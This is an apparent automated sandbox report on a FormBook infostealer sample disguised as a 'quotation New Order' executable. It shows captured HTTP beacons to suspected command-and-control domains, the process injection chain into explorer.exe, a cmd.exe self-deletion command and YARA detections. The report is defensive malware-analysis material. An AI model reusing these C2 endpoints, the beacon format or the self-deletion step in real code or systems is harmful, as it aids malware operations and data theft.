Jan 10, 2022 08:55:50.098130941 CET	10721	IN	HTTP/1.1 403 Forbidden Server: awselb/2.0 Date: Mon, 10 Jan 2022 07:55:50 GMT Content-Type: text/html Content-Length: 118 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
5	192.168.2.3	49823	136.143.191.204	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Jan 10, 2022 08:55:55.443573952 CET	10722	OUT	GET /n8bs/?4hJLWJ=klWsC1oO4pFLOH/ubbPBsuuNG6ECcuE/tWLY9Ci8D79EoLLMyfySTrTS/TXNAHCZkRkB&Mtx=0PvL86-xjV HTTP/1.1 Host: www.pinnaclecorporaterentals.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Jan 10, 2022 08:55:55.627110004 CET	10723	IN	HTTP/1.1 404 Server: ZGS Date: Mon, 10 Jan 2022 07:55:55 GMT Content-Type: text/html Content-Length: 4671 Connection: close Set-Cookie: 0cea9df7db=9a53152e40f8a6327f1486af29c1a1cb; Path=/ X-XSS-Protection: 1 Set-Cookie: csrfc=ada82dcc-bc14-4130-811b-a4275aaa6a07;path=/;priority=high Set-Cookie: _zcsr_tmp=ada82dcc-bc14-4130-811b-a4275aaa6a07;path=/;SameSite=Strict;priority=high Pragma: no-cache Cache-Control: private,no-cache,no-store,max-age=0,must-revalidate Expires: Thu, 01 Jan 1970 00:00:00 GMT vary: accept-encoding Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 2c 20 6e 6f 61 72 63 68 69 76 65 2c 20 6e 6f 73 6e 69 70 70 65 74 22 20 2f 3e 0a 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 5a 6f 68 6f 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 77 65 62 66 6f 6e 74 73 3f 66 61 6d 69 6c 79 3d 4f 70 65 6e 2b 53 61 6e 73 3a 34 30 30 2c 36 30 30 22 3e 0a 20 20 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20 20 20 62 6f 64 79 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 4f 70 65 6e 20 53 61 6e 73 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 31 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 30 70 78 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 30 70 78 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 35 66 35 66 35 3b 0a 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 2e 74 6f 70 43 6f 6c 6f 72 73 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 2d 6d 6f 7a 2d 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 6c 65 66 74 2c 20 23 66 30 34 37 33 64 20 30 25 2c 20 23 66 30 34 37 33 64 20 32 35 25 2c 20 23 30 34 39 37 33 35 20 32 35 25 2c 20 23 30 34 39 37 33 35 20 35 30 25 2c 20 23 30 30 38 36 64 35 20 35 30 25 2c 20 23 30 30 38 36 64 35 20 37 35 25 2c 20 23 66 64 63 30 30 30 20 37 35 25 2c 23 66 64 63 30 30 30 20 31 30 30 25 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 2d 77 65 62 6b 69 74 2d 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 6c 65 66 74 2c 20 23 66 30 34 37 33 64 20 30 25 2c 20 23 66 30 34 37 33 64 20 32 35 25 2c 20 23 30 34 39 37 33 35 20 32 35 25 2c 20 23 30 34 39 37 33 35 20 35 30 25 2c 20 23 30 30 38 36 64 35 20 35 30 25 2c 20 23 30 30 38 36 64 35 20 37 35 25 2c 20 23 66 64 63 30 30 30 20 37 35 25 2c 23 66 64 63 30 30 30 20 31 30 30 25 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 73 69 7a 65 3a 34 35 Data Ascii: <!DOCTYPE html><html> <head> <meta name="robots" content="noindex, nofollow, noarchive, nosnippet" /> <title>Zoho</title> <link type="text/css" rel="stylesheet" href="/webfonts?family=Open+Sans:400,600"> <style> body{ font-family:"Open Sans", sans-serif; font-size:11px; margin:0px; padding:0px; background-color:#f5f5f5; } .topColors{ background: -moz-linear-gradient(left, #f0473d 0%, #f0473d 25%, #049735 25%, #049735 50%, #0086d5 50%, #0086d5 75%, #fdc000 75%,#fdc000 100%); background: -webkit-linear-gradient(left, #f0473d 0%, #f0473d 25%, #049735 25%, #049735 50%, #0086d5 50%, #0086d5 75%, #fdc000 75%,#fdc000 100%); background-size:45
Jan 10, 2022 08:55:55.627187967 CET	10724	IN	Data Raw: 32 70 78 20 61 75 74 6f 3b 68 65 69 67 68 74 3a 33 70 78 3b 0a 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 2e 6d 61 69 6e 43 6f 6e 74 61 69 6e 65 72 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 31 30 30 30 70 78 3b Data Ascii: 2px auto;height:3px; } .mainContainer{ width:1000px; margin:0px auto; } .logo{ margin-top:3px; padding:18px 0px; } .content{ back
Jan 10, 2022 08:55:55.627265930 CET	10726	IN	Data Raw: 2d 77 65 69 67 68 74 3a 34 30 30 3b 20 0a 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 2e 64 6f 6d 61 69 6e 2d 63 6f 6c 6f 72 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 23 30 30 38 36 44 35 3b 20 0a 20 20 20 20 Data Ascii: -weight:400; } .domain-color{ color:#0086D5; } .main-info{ margin-top: 40px; } .main-info li { font-size: 16px; padding: 10px 0;
Jan 10, 2022 08:55:55.627321959 CET	10727	IN	Data Raw: 6f 72 73 22 3e 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 61 69 6e 43 6f 6e 74 61 69 6e 65 72 22 3e 0a 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 6c 6f 67 6f 22 3e 3c 69 6d 67 20 73 72 63 3d Data Ascii: ors"></div> <div class="mainContainer"> <div class="logo"><img src="https://contacts.zoho.com/static/file?t=org&ID=456089&fs=thumb" alt="Zoho"></div> <div class="content"> <div class="textArea">

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
6	192.168.2.3	49824	162.144.34.39	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Jan 10, 2022 08:56:00.914690971 CET	10728	OUT	GET /n8bs/?4hJLWJ=P1PWYcL+/hkTuAmEUVew+E7DjpBsgHpPBHkumuCE+t//nspYDrLxOzxmHnBKSVqws4Kv&Mtx=0PvL86-xjV HTTP/1.1 Host: www.myveguiolcusbyopappgroup.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Jan 10, 2022 08:56:01.082258940 CET	10729	IN	HTTP/1.1 404 Not Found Date: Mon, 10 Jan 2022 07:56:00 GMT Server: Apache Accept-Ranges: bytes Cache-Control: no-cache, no-store, must-revalidate Pragma: no-cache Expires: 0 Connection: close Transfer-Encoding: chunked Content-Type: text/html Data Raw: 31 0d 0a 0a 0d 0a 31 0d 0a 0a 0d 0a 31 0d 0a 0a 0d 0a 31 35 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 0d 0a 33 0d 0a 34 30 34 0d 0a 31 0d 0a 20 0d 0a 39 0d 0a 4e 6f 74 20 46 6f 75 6e 64 0d 0a 31 66 63 61 0d 0a 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 34 32 38 35 37 31 34 32 39 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 32 46 33 32 33 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 73 65 63 74 69 6f 6e 2c 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 20 31 30 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 72 65 73 70 6f 6e 73 65 2d 69 6e 66 6f 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 43 43 43 43 43 43 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 73 74 61 74 75 73 2d 63 6f 64 65 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 35 30 30 25 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 73 74 61 74 75 73 2d 72 65 61 73 6f 6e 20 7b Data Ascii: 111157<!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" content="0"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>34041 9Not Found1fca</title> <style type="text/css"> body { font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 1.428571429; background-color: #ffffff; color: #2F3230; padding: 0; margin: 0; } section, footer { display: block; padding: 0; margin: 0; } .container { margin-left: auto; margin-right: auto; padding: 0 10px; } .response-info { color: #CCCCCC; } .status-code { font-size: 500%; } .status-reason {
Jan 10, 2022 08:56:01.082298040 CET	10731	IN	Data Raw: 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 35 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 Data Ascii: font-size: 250%; display: block; } .contact-info, .reason-text { color: #000000; } .additional-info { background-repeat: no-repeat; background
Jan 10, 2022 08:56:01.082334042 CET	10732	IN	Data Raw: 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 77 6f 72 64 2d 62 72 65 61 6b 3a 20 62 72 65 61 6b 2d 61 6c 6c 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 69 Data Ascii: ; word-break: break-all; width: 100%; } .info-server address { text-align: left; } footer { text-align: center; margin: 60px 0; } foote
Jan 10, 2022 08:56:01.082370996 CET	10733	IN	Data Raw: 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 6c 65 66 74 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 72 69 Data Ascii: text-align: left; position: absolute; right: 0; bottom: 0; margin: 0 10px; } .status-reason { display: inline; }
Jan 10, 2022 08:56:01.082407951 CET	10735	IN	Data Raw: 44 42 31 4d 64 32 30 59 66 69 52 2b 55 46 66 76 64 49 69 7a 70 32 76 31 76 56 6a 74 30 75 73 61 31 70 6d 4e 7a 41 58 32 49 46 6c 35 2f 78 61 45 39 61 71 51 47 53 44 36 62 78 49 30 52 5a 53 77 33 75 75 46 30 59 6a 51 48 65 70 6a 4d 78 48 6d 64 39 Data Ascii: DB1Md20YfiR+UFfvdIizp2v1vVjt0usa1pmNzAX2IFl5/xaE9aqQGSD6bxI0RZSw3uuF0YjQHepjMxHmd9IgC1NbY1VSkdeB4vXMH0KSQVIvQfERciMpcaFtW4H8iI0gB2MzfEcV3gB+IkfDtbyCATgtHB7l3TrKUG2yWOe7O2KYQIPE7xFD12Yvy6SvqoLOMf95k+BvgqogCFCx22NdltO1epYc7ycEKSaI9+UAYPGOlKDQYyx
Jan 10, 2022 08:56:01.082441092 CET	10736	IN	Data Raw: 54 2f 75 4b 4c 30 52 49 51 38 44 7a 59 4f 4b 4a 75 39 38 56 30 30 36 4c 62 53 49 6b 76 42 73 52 6c 7a 42 50 59 6b 49 52 49 48 31 37 34 33 69 45 69 65 6c 42 54 34 69 51 52 6b 4e 48 77 55 51 4d 55 74 54 57 58 71 73 69 51 75 67 42 69 77 6c 37 33 4f Data Ascii: T/uKL0RIQ8DzYOKJu98V006LbSIkvBsRlzBPYkIRIH1743iEielBT4iQRkNHwUQMUtTWXqsiQugBiwl73OOrV0RIq/6+BIPPVVLrbAVAulQKIwAO/9jUKyJk51SmO5wwhpHXac0E3EQEfRIu6TfBYLQn/J3eCcFdE7i4dwmHckWErJsmU7eIsGnLxpVpVETI4kVM3VCUw1+XdRPRaM0k64jL1LEFkBBGRw7ad1ZE+AVH74Xh8NQ
Jan 10, 2022 08:56:01.082472086 CET	10737	IN	Data Raw: 61 7a 70 31 36 54 53 43 4f 66 5a 70 70 4d 69 47 44 36 69 56 71 72 32 37 31 6f 56 6f 6b 55 36 41 4a 39 55 35 46 47 6e 58 49 77 77 35 6d 48 2b 6b 4c 45 68 78 49 31 63 6c 32 30 51 43 47 43 54 67 52 4d 41 2f 33 2b 46 32 6c 52 58 58 74 7a 58 68 55 52 Data Ascii: azp16TSCOfZppMiGD6iVqr271oVokU6AJ9U5FGnXIww5mH+kLEhxI1cl20QCGCTgRMA/3+F2lRXXtzXhURPTTt9GQA6h+d/1dE5An9GRH5o5mwIgKHvhCBi5j60Bci8oe+EKEPrYmg+QNNOw3PdCLgpBUROPQ18mX1ZEx8p9//Ii0qc3Qi6CmAU1dEpD9SA1tT98/GZadvf29GxPYPh9n+MjAuRNg/Hc4WYm8WjT0pABNB7WkAb
Jan 10, 2022 08:56:01.082716942 CET	10739	IN	Data Raw: 33 37 0d 0a 34 30 34 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 73 74 61 74 75 73 2d 72 65 61 73 6f 6e 22 3e 0d 0a 38 38 0d 0a 4e 6f 74 20 46 6f 75 6e 64 3c 2f 73 70 61 6e 3e 0a Data Ascii: 37404</span> <span class="status-reason">88Not Found</span> </section> <section class="contact-info"> Please forward this error screen to 33www.myveguiolcusbyopappgroup.com's <
Jan 10, 2022 08:56:01.082806110 CET	10739	IN	Data Raw: 0a 31 30 37 0d 0a 3c 2f 6c 69 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 75 6c 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 Data Ascii: 107</li> </ul> </div> </div> </section> <footer> <div class="container"> <a href="http://cpanel.com/?utm_source=cpanelwhm&utm_medium=cplogo&utm_cont

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: quotation New Order I5117.exe PID: 6380 Parent PID: 4332

General

Start time:	08:53:58
Start date:	10/01/2022
Path:	C:\Users\user\Desktop\quotation New Order I5117.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\quotation New Order I5117.exe"
Imagebase:	0xed0000
File size:	733184 bytes
MD5 hash:	A45506FEAA8BC01B90ECC3204BC45B6E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000001.00000002.300985845.0000000003301000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.301720083.0000000004301000.00000004.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.301720083.0000000004301000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.301720083.0000000004301000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000001.00000002.301124869.00000000033C9000.00000004.00000001.sdmp, Author: Joe Security
Reputation:	low

Chronological Activities

Analysis Process: quotation New Order I5117.exe PID: 6800 Parent PID: 6380

General

Start time:	08:54:08
Start date:	10/01/2022
Path:	C:\Users\user\Desktop\quotation New Order I5117.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Desktop\quotation New Order I5117.exe
Imagebase:	0xa80000
File size:	733184 bytes
MD5 hash:	A45506FEAA8BC01B90ECC3204BC45B6E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000C.00000002.379998349.00000000014B0000.00000040.00020000.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000C.00000002.379998349.00000000014B0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 0000000C.00000002.379998349.00000000014B0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000C.00000000.297677672.0000000000400000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000C.00000000.297677672.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 0000000C.00000000.297677672.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000C.00000000.298278607.0000000000400000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000C.00000000.298278607.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 0000000C.00000000.298278607.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000C.00000002.379109790.0000000000400000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000C.00000002.379109790.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 0000000C.00000002.379109790.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000C.00000002.380945973.0000000001820000.00000040.00020000.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000C.00000002.380945973.0000000001820000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 0000000C.00000002.380945973.0000000001820000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	low

Chronological Activities

Analysis Process: explorer.exe PID: 3352 Parent PID: 6800

General

Start time:	08:54:11
Start date:	10/01/2022
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Explorer.EXE
Imagebase:	0x7ff720ea0000
File size:	3933184 bytes
MD5 hash:	AD5296B280E8F522A8A897C96BAB0E1D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000D.00000000.353744054.000000000FD3E000.00000040.00020000.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000D.00000000.353744054.000000000FD3E000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 0000000D.00000000.353744054.000000000FD3E000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000D.00000000.335216417.000000000FD3E000.00000040.00020000.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000D.00000000.335216417.000000000FD3E000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 0000000D.00000000.335216417.000000000FD3E000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	high

Chronological Activities

Analysis Process: cmd.exe PID: 6500 Parent PID: 3352

General

Start time:	08:54:44
Start date:	10/01/2022
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\cmd.exe
Imagebase:	0xd80000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000011.00000002.544184245.0000000003140000.00000040.00020000.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000011.00000002.544184245.0000000003140000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000011.00000002.544184245.0000000003140000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000011.00000002.542742634.0000000000BE0000.00000040.00020000.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000011.00000002.542742634.0000000000BE0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000011.00000002.542742634.0000000000BE0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000011.00000002.544623033.0000000003170000.00000004.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000011.00000002.544623033.0000000003170000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000011.00000002.544623033.0000000003170000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	high

Chronological Activities

Analysis Process: cmd.exe PID: 5496 Parent PID: 6500

General

Start time:	08:54:48
Start date:	10/01/2022
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	/c del "C:\Users\user\Desktop\quotation New Order I5117.exe"
Imagebase:	0xd80000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: conhost.exe PID: 5924 Parent PID: 5496

General

Start time:	08:54:49
Start date:	10/01/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7f20f0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: quotation New Order I5117.exe PID: 6380 Parent PID: 4332 quotation New Order I5117.exeCOMMON

Execution Graph

Execution Coverage:	13%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	178
Total number of Limit Nodes:	9

Executed Functions

Function 06321E88, Relevance: .7, Instructions: 739COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.304014205.0000000006320000.00000040.00000001.sdmp, Offset: 06320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6320000_quotation New Order I5117.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 91ff614f75ca3a0ab2ac9255716fe8ce57488b92dd1c7ca7279d145b0e009e3d
